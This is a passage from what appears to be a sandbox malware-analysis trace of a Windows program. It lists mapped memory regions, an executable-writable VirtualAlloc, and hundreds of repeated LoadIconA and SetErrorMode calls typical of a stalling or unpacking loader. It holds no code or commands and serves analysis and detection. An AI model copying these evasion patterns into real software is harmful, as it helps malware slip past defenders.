"\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 399 start_va = 0xf230000 end_va = 0xf233fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 400 start_va = 0xf940000 end_va = 0xf9cdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 401 start_va = 0xf420000 end_va = 0xf423fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 402 start_va = 0xf9d0000 end_va = 0xf9e8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db") Region: id = 403 start_va = 0xf430000 end_va = 0xf430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f430000" filename = "" Region: id = 404 start_va = 0xf9f0000 end_va = 0xfa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f9f0000" filename = "" Region: id = 405 start_va = 0xfa30000 end_va = 0xfb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fa30000" filename = "" Region: id = 406 start_va = 0xfb30000 end_va = 0xfb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb30000" filename = "" Region: id = 407 start_va = 0xfb70000 end_va = 0xfc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 426 start_va = 0x6d480000 end_va = 0x6d48bfff monitored = 0 entry_point = 0x6d484ad0 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\SysWOW64\\pcacli.dll" (normalized: "c:\\windows\\syswow64\\pcacli.dll") Region: id = 427 start_va = 0x6c8d0000 end_va = 0x6c8e5fff monitored = 0 entry_point = 0x6c8d21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Thread: id = 1 os_tid = 0xfc8 [0184.155] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0184.211] SetErrorMode (uMode=0x2) returned 0x0 [0184.305] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="interface\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x4322cc | out: phkResult=0x4322cc*=0xc6) returned 0x0 [0184.307] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0184.307] RegQueryValueExA (in: hKey=0xc6, lpValueName="", lpReserved=0x0, lpType=0x19ff30, lpData=0x19fdf4, lpcbData=0x19ff28*=0x12c | out: lpType=0x19ff30*=0x1, lpData="IActiveScriptParseProcedure32", lpcbData=0x19ff28*=0x1e) returned 0x0 [0187.721] VirtualAlloc (lpAddress=0x0, dwSize=0x28a00, flAllocationType=0x3000, flProtect=0x40) returned 0x510000 [0187.722] SetErrorMode (uMode=0x2) returned 0x2 [0187.722] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.723] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.724] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.725] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.726] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.727] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.728] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.729] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.730] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.731] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.732] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.733] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.734] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.735] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.736] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.737] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.740] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.741] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.742] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] SetErrorMode (uMode=0x2) returned 0x2 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.743] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.744] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.745] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.746] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.746] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.746] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.746] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.746] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.746] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.746] LoadIconA (hInstance=0x0, lpIconName=0x85d) returned 0x0 [0187.754] SetErrorMode (uMode=0x2) returned 0x2 [0187.760] SetErrorMode (uMode=0x2) returned 0x2 [0187.769] SetErrorMode (uMode=0x2) returned 0x2 [0187.775] SetErrorMode (uMode=0x2) returned 0x2 [0187.782] SetErrorMode (uMode=0x2) returned 0x2 [0187.790] SetErrorMode (uMode=0x2) returned 0x2 [0187.799] SetErrorMode (uMode=0x2) returned 0x2 [0187.813] SetErrorMode (uMode=0x2) returned 0x2 [0187.819] SetErrorMode (uMode=0x2) returned 0x2 [0187.827] SetErrorMode (uMode=0x2) returned 0x2 [0187.834] SetErrorMode (uMode=0x2) returned 0x2 [0187.840] SetErrorMode (uMode=0x2) returned 0x2 [0187.845] SetErrorMode (uMode=0x2) returned 0x2 [0187.850] SetErrorMode (uMode=0x2) returned 0x2 [0187.856] SetErrorMode (uMode=0x2) returned 0x2 [0187.861] SetErrorMode (uMode=0x2) returned 0x2 [0187.874] SetErrorMode (uMode=0x2) returned 0x2 [0187.879] SetErrorMode (uMode=0x2) returned 0x2 [0187.886] SetErrorMode (uMode=0x2) returned 0x2 [0187.891] SetErrorMode (uMode=0x2) returned 0x2 [0187.897] SetErrorMode (uMode=0x2) returned 0x2 [0187.903] SetErrorMode (uMode=0x2) returned 0x2 [0187.911] SetErrorMode (uMode=0x2) returned 0x2 [0187.917] SetErrorMode (uMode=0x2) returned 0x2 [0187.923] SetErrorMode (uMode=0x2) returned 0x2 [0187.928] SetErrorMode (uMode=0x2) returned 0x2 [0187.940] SetErrorMode (uMode=0x2) returned 0x2 [0187.947] SetErrorMode (uMode=0x2) returned 0x2 [0187.952] SetErrorMode (uMode=0x2) returned 0x2 [0187.960] SetErrorMode (uMode=0x2) returned 0x2 [0187.966] SetErrorMode (uMode=0x2) returned 0x2 [0187.971] SetErrorMode (uMode=0x2) returned 0x2 [0187.978] SetErrorMode (uMode=0x2) returned 0x2 [0187.984] SetErrorMode (uMode=0x2) returned 0x2 [0187.990] SetErrorMode (uMode=0x2) returned 0x2 [0187.996] SetErrorMode (uMode=0x2) returned 0x2 [0188.015] SetErrorMode (uMode=0x2) returned 0x2 [0188.021] SetErrorMode (uMode=0x2) returned 0x2 [0188.026] SetErrorMode (uMode=0x2) returned 0x2 [0188.032] SetErrorMode (uMode=0x2) returned 0x2 [0188.038] SetErrorMode (uMode=0x2) returned 0x2 [0188.044] SetErrorMode (uMode=0x2) returned 0x2 [0188.049] SetErrorMode (uMode=0x2) returned 0x2 [0188.054] SetErrorMode (uMode=0x2) returned 0x2 [0188.059] SetErrorMode (uMode=0x2) returned 0x2 [0188.094] SetErrorMode (uMode=0x2) returned 0x2 [0188.124] SetErrorMode (uMode=0x2) returned 0x2 [0188.133] SetErrorMode (uMode=0x2) returned 0x2 [0188.138] SetErrorMode (uMode=0x2) returned 0x2 [0188.144] SetErrorMode (uMode=0x2) returned 0x2 [0188.152] SetErrorMode (uMode=0x2) returned 0x2 [0188.157] SetErrorMode (uMode=0x2) returned 0x2 [0188.163] SetErrorMode (uMode=0x2) returned 0x2 [0188.169] SetErrorMode (uMode=0x2) returned 0x2 [0188.175] SetErrorMode (uMode=0x2) returned 0x2 [0188.182] SetErrorMode (uMode=0x2) returned 0x2 [0188.188] SetErrorMode (uMode=0x2) returned 0x2 [0188.193] SetErrorMode (uMode=0x2) returned 0x2 [0188.207] SetErrorMode (uMode=0x2) returned 0x2 [0188.212] SetErrorMode (uMode=0x2) returned 0x2 [0188.217] SetErrorMode (uMode=0x2) returned 0x2 [0188.222] SetErrorMode (uMode=0x2) returned 0x2 [0188.228] SetErrorMode (uMode=0x2) returned 0x2 [0188.233] SetErrorMode (uMode=0x2) returned 0x2 [0188.238] SetErrorMode (uMode=0x2) returned 0x2 [0188.245] SetErrorMode (uMode=0x2) returned 0x2 [0188.250] SetErrorMode (uMode=0x2) returned 0x2 [0188.255] SetErrorMode (uMode=0x2) returned 0x2 [0188.263] SetErrorMode (uMode=0x2) returned 0x2 [0188.268] SetErrorMode (uMode=0x2) returned 0x2 [0188.272] SetErrorMode (uMode=0x2) returned 0x2 [0188.277] SetErrorMode (uMode=0x2) returned 0x2 [0188.286] SetErrorMode (uMode=0x2) returned 0x2 [0188.291] SetErrorMode (uMode=0x2) returned 0x2 [0188.296] SetErrorMode (uMode=0x2) returned 0x2 [0188.301] SetErrorMode (uMode=0x2) returned 0x2 [0188.306] SetErrorMode (uMode=0x2) returned 0x2 [0188.311] SetErrorMode (uMode=0x2) returned 0x2 [0188.336] SetErrorMode (uMode=0x2) returned 0x2 [0188.341] SetErrorMode (uMode=0x2) returned 0x2 [0188.346] SetErrorMode (uMode=0x2) returned 0x2 [0188.351] SetErrorMode (uMode=0x2) returned 0x2 [0188.356] SetErrorMode (uMode=0x2) returned 0x2 [0188.361] SetErrorMode (uMode=0x2) returned 0x2 [0188.366] SetErrorMode (uMode=0x2) returned 0x2 [0188.374] SetErrorMode (uMode=0x2) returned 0x2 [0188.379] SetErrorMode (uMode=0x2) returned 0x2 [0188.384] SetErrorMode (uMode=0x2) returned 0x2 [0188.393] SetErrorMode (uMode=0x2) returned 0x2 [0188.398] SetErrorMode (uMode=0x2) returned 0x2 [0188.403] SetErrorMode (uMode=0x2) returned 0x2 [0188.408] SetErrorMode (uMode=0x2) returned 0x2 [0188.415] SetErrorMode (uMode=0x2) returned 0x2 [0188.420] SetErrorMode (uMode=0x2) returned 0x2 [0188.425] SetErrorMode (uMode=0x2) returned 0x2 [0188.430] SetErrorMode (uMode=0x2) returned 0x2 [0188.435] SetErrorMode (uMode=0x2) returned 0x2 [0188.440] SetErrorMode (uMode=0x2) returned 0x2 [0188.446] 